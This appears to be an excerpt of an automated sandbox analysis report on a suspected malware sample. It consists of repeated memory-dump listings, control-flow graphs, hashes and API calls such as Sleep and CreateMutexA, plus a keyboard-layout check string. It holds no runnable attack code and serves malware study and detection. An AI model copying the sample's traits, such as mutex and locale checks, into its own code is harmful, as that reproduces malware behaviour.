                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                            • API String ID: 0-3963862150
                                                                                                                                            • Opcode ID: 68643f6aa8f757d869414b3ae24c6a8496c6a361b7cf59b562c8298b0d11af1b
                                                                                                                                            • Instruction ID: 422f3a35a12535deb14808ee2aadb83be54e707cde0ec50a2e3b6353bba58f47
                                                                                                                                            • Opcode Fuzzy Hash: 68643f6aa8f757d869414b3ae24c6a8496c6a361b7cf59b562c8298b0d11af1b
                                                                                                                                            • Instruction Fuzzy Hash: 65F1C270900258AFEF24DF54CD85BDEBBB9EB45304F5041AEF509A7281DB789A84CF98

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 92 499ba5-499d91 call 4a7a00 call 495c10 call 498b30 call 4a8220
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: 6a0690fa0c5a49afb4b3db2d88f3a455565c323491ff45f3c05a0a131f555bac
                                                                                                                                            • Instruction ID: df4aef408eff9b05aa7d5a7f4bb23941964e93a25684759d8dc2aba5936955fc
                                                                                                                                            • Opcode Fuzzy Hash: 6a0690fa0c5a49afb4b3db2d88f3a455565c323491ff45f3c05a0a131f555bac
                                                                                                                                            • Instruction Fuzzy Hash: 18314C71A041448BEF08DB7CDD89B6EBF62EB82315F20462EE014973D5D77D99808759

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 114 499f44-499f64 118 499f92-499fae 114->118 119 499f66-499f72 114->119 122 499fdc-499ffb 118->122 123 499fb0-499fbc 118->123 120 499f88-499f8f call 4ad663 119->120 121 499f74-499f82 119->121 120->118 121->120 128 49a92b 121->128 126 49a029-49a916 call 4a80c0 122->126 127 499ffd-49a009 122->127 124 499fbe-499fcc 123->124 125 499fd2-499fd9 call 4ad663 123->125 124->125 124->128 125->122 131 49a00b-49a019 127->131 132 49a01f-49a026 call 4ad663 127->132 134 49a953-49a994 Sleep CreateMutexA 128->134 135 49a92b call 4c6c6a 128->135 131->128 131->132 132->126 144 49a9a7-49a9a8 134->144 145 49a996-49a998 134->145 135->134 145->144 146 49a99a-49a9a5 145->146 146->144
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: 7ade40eb5e6217a4256cc94fb79ca8f8ff694bea21c543e8128fa243ff98b056
                                                                                                                                            • Instruction ID: 70c5d08a7b6dff532c6446fb8c0516587fcc3d06052a0495c7044fb516826acd
                                                                                                                                            • Opcode Fuzzy Hash: 7ade40eb5e6217a4256cc94fb79ca8f8ff694bea21c543e8128fa243ff98b056
                                                                                                                                            • Instruction Fuzzy Hash: 69314871A041448BEF08DB6CCD887ADBF62EB86318F24462EE014D73D9D77D9990875A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 148 49a079-49a099 152 49a09b-49a0a7 148->152 153 49a0c7-49a0e3 148->153 154 49a0a9-49a0b7 152->154 155 49a0bd-49a0c4 call 4ad663 152->155 156 49a111-49a130 153->156 157 49a0e5-49a0f1 153->157 154->155 160 49a930 154->160 155->153 158 49a15e-49a916 call 4a80c0 156->158 159 49a132-49a13e 156->159 162 49a0f3-49a101 157->162 163 49a107-49a10e call 4ad663 157->163 164 49a140-49a14e 159->164 165 49a154-49a15b call 4ad663 159->165 168 49a953-49a994 Sleep CreateMutexA 160->168 169 49a930 call 4c6c6a 160->169 162->160 162->163 163->156 164->160 164->165 165->158 178 49a9a7-49a9a8 168->178 179 49a996-49a998 168->179 169->168 179->178 180 49a99a-49a9a5 179->180 180->178
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: a9f4d91e76badd8024e73dd1842ff62772c78a19aa87e8403564ec9b067f9dfd
                                                                                                                                            • Instruction ID: 7e2f98c0b2ab4e1fdcfbf5bcf90bdc21ce3e5db3d4f653a17b59c7b736026ab6
                                                                                                                                            • Opcode Fuzzy Hash: a9f4d91e76badd8024e73dd1842ff62772c78a19aa87e8403564ec9b067f9dfd
                                                                                                                                            • Instruction Fuzzy Hash: 49314A71B041409BEF08DF7CCD89B6DBF62EB82318F24462EE014973D5D77E9990869A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
